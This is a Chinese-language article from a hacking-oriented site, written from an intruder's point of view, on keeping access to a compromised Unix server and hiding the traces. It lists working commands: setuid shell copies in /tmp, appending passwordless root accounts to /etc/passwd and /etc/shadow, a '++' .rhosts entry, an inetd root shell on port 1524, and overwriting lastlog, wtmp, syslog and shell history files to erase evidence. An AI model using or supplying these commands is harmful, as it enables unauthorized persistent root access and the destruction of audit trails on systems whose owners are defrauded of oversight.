您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 网络管理 查看内容

系统后门手法和日志的擦除

2008-11-4 10:09| 投稿: Linux

摘要:   好不容易搞了太服务器很不容易,如果被发现了就没了!可惜啊!  其实,开后门的方法有很多种  1. setuid  #cp /bin/sh /tmp/.sh  #chmod u+s /tmp/.sh...
  好不容易搞了太服务器很不容易,如果被发现了就没了!可惜啊!  其实,开后门的方法有很多种  1. setuid  #cp /bin/sh /tmp/.sh  #chmod u+s /tmp/.sh  加上 suid 位到shell上,虽然很简单,但容易被发现  2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd  即给系统增加一个 id 为 0(root)的帐号,无口令。  但管理员很快就可以发现哦!  3.echo "++">>/.rhosts  如果这个系统开了512,513的port呵呵,就可以  把一个名为hack加到.rhosts文件中,rlogin登陆,无要密码!  4.修改 sendmail.cf文件 增加一个"wiz" 命令;  然后telnet www.xxx.com 25后,wiz。。。。ok  5。 改已有用户密码  如果主机上有好多用户,当你看到一个用户好久没登入了,就可以改他的密码  #passwd 可用passwd命令。  6.rootkit后门包  网上有好多地方下载,找找,自己试试看,我也在测试中!不会啊!!!!  -Bsd 后门:  echo love::92:206::0:0::/:/bin/sh >> /etc/master.passwd  /usr/sbin/pwd_mkdb /etc/master.passwd  这里我添加一个love的用户用户的ID是92;ROOT的是0哦!  好了我们添加一个用户了!那么权限不够怎么办呢?  cp /bin/sh /tmp/.x (这个x就是随便选个,好像 .sh , .a , .b 等等)  chmod 777 /tmp/.x  chmod +s /tmp/.x  用这个给他做个小后门吧  以后我们登陆的这台肉鸡以后就可以用tmp/.x来提升权限了。  -AIX 后门 (Kelvinzhou教我的,感谢你)  echo "ingreslock stream tcp nowait root /bin/sh">>/tmp/.x  /usr/sbin/inetd -s /tmp/.x  rm /tmp/.x  这样你就可以telnet ip 1524直接得到rootshell  -SunOs 后门  echo "love::0:0::/:/bin/bash" >> /etc/passwd  echo "love::::::::" >> /etc/shadow  当你以telnet上时,你就是root了!不过不保险!  -Linux 后门  echo "love::0:0::/:/bin/bash" >> /etc/passwd  echo "love::::::::" >> /etc/shadow  有时间的话,就多留几个后门!  留了后门就要擦你的PP了,不是吧,这也忘了!  Unix系统日志文件通常是存放在 "/var/log and /var/adm" 目录下的。通常我们可以查看syslog.conf来看看日志配置的情况.如:cat /etc/syslog.conf  一般我们要清除的日志有  lastlog  utmp  wtmp  messages  syslog  sulog  此外,各种shell还会记录用户使用的命令历史,它使用用户主目录下的文件来记录这些命令历史,通常这个文件的名字为.sh_history (ksh),.history (csh),或.bash_history (bash)等。  如果你有像wipe.c 那样的清日志的程序,就可以让它来做,不然的话就要手动了! 建议不要用rm掉日志,最好是,把日志改编,  比如:  #cat > /usr/log/lastlog  ->这里是你要的写的东西,也可以不输入哦!  ^d ->这里的^d是按键 ctrl + d! 结束!  #  好了不说了,要学的还好多,我也很菜!see!

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部